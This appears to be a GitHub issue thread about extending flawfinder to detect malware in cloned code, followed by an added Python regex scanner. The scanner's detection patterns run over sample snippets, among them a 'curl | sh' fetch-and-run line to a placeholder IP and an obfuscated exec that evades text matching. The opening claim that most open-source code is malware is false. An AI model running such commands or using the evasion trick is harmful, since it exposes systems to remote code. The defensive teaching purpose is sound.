As we all know, most open source code on the Internet (and GitHub specifically) is malware, mostly spyware.
Before or after every Git clone you have to spend a lot of time checking the source code for malicious code. I've been searching for a way to automate that. Can this project be extended to that?
If there are specific text patterns in code to look for, flawfinder could easily be extended to look for those patterns. If you can point me to specific patterns that'd be great.
The larger problem is detecting unknown patterns. Flawfinder is useless for that; it's based on a simple text-matching system, and doesn't even have control or data flow analysis. Even very sophisticated static analyzers struggle with unknown patterns.
So: If you have specific text patterns to look for, please post them (and preferably an example of where you found it). That won't solve everything, but it might help!
I don't have any specific text patterns to look for, so I'm closing this. If you have something in mind, let me know. If you want a traditional virus scanner, there are other tools specifically focused on that; there's no reason to duplicate them.
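To make the trade-off described in the maintainer's replies concrete, here is an added example that is not flawfinder's own code and not part of the original thread: a flawfinder-style line-by-line regex scanner with a few hypothetical patterns, run over constructed source snippets. It shows that an obvious pattern is caught on the line where it appears, while the same behaviour split across several lines or built from string fragments produces no match, which is exactly the gap that needs control- and data-flow analysis rather than text matching. The pattern names, regexes and sample sources are assumptions chosen for illustration; the samples are never executed.

```python
"""Minimal flawfinder-style text matcher (added example, not flawfinder code).

It scans source text one line at a time with regular expressions and has no
notion of parsing, control flow or data flow, which is what makes it cheap
and also what makes it easy to evade.
"""
import re
from typing import List, Tuple

# Hypothetical patterns one might add to a text matcher: (name, compiled regex).
PATTERNS = [
    ("python-exec-of-decoded-data",
     re.compile(r"\bexec\s*\(\s*(base64|codecs|zlib)\.")),
    ("outbound-http-to-ip",
     re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}")),
    ("curl-pipe-shell",
     re.compile(r"\bcurl\b[^|\n]*\|\s*(ba)?sh\b")),
]


def scan_source(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, pattern_name, stripped_line) for every hit.

    Each line is matched independently, so a construct that spans lines or
    is assembled at runtime is invisible to this scanner.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in PATTERNS:
            if rx.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


# Constructed sample 1: the suspicious call is on one line, so it is caught.
OBVIOUS = '''import base64
payload = "aW1wb3J0IG9z"
exec(base64.b64decode(payload))
'''

# Constructed sample 2: same behaviour, but the names are built from fragments
# and looked up at runtime; no single line contains the text pattern.
EVASIVE = '''import base64 as b
import builtins
fn = getattr(b, "b64" + "decode")
run = getattr(builtins, "ex" + "ec")
run(fn("aW1wb3J0IG9z"))
'''

# Constructed sample 3: a shell snippet that trips two patterns on one line.
SHELL = '''#!/bin/sh
curl -fsSL http://203.0.113.5/install.sh | sh
'''


if __name__ == "__main__":
    for label, sample in (("obvious", OBVIOUS), ("evasive", EVASIVE), ("shell", SHELL)):
        print(label, scan_source(sample))
```

Running the block prints one hit for the obvious sample, two for the shell sample, and an empty list for the evasive sample, even though the evasive sample does the same thing as the obvious one; adding more regexes only moves the line an attacker has to avoid writing.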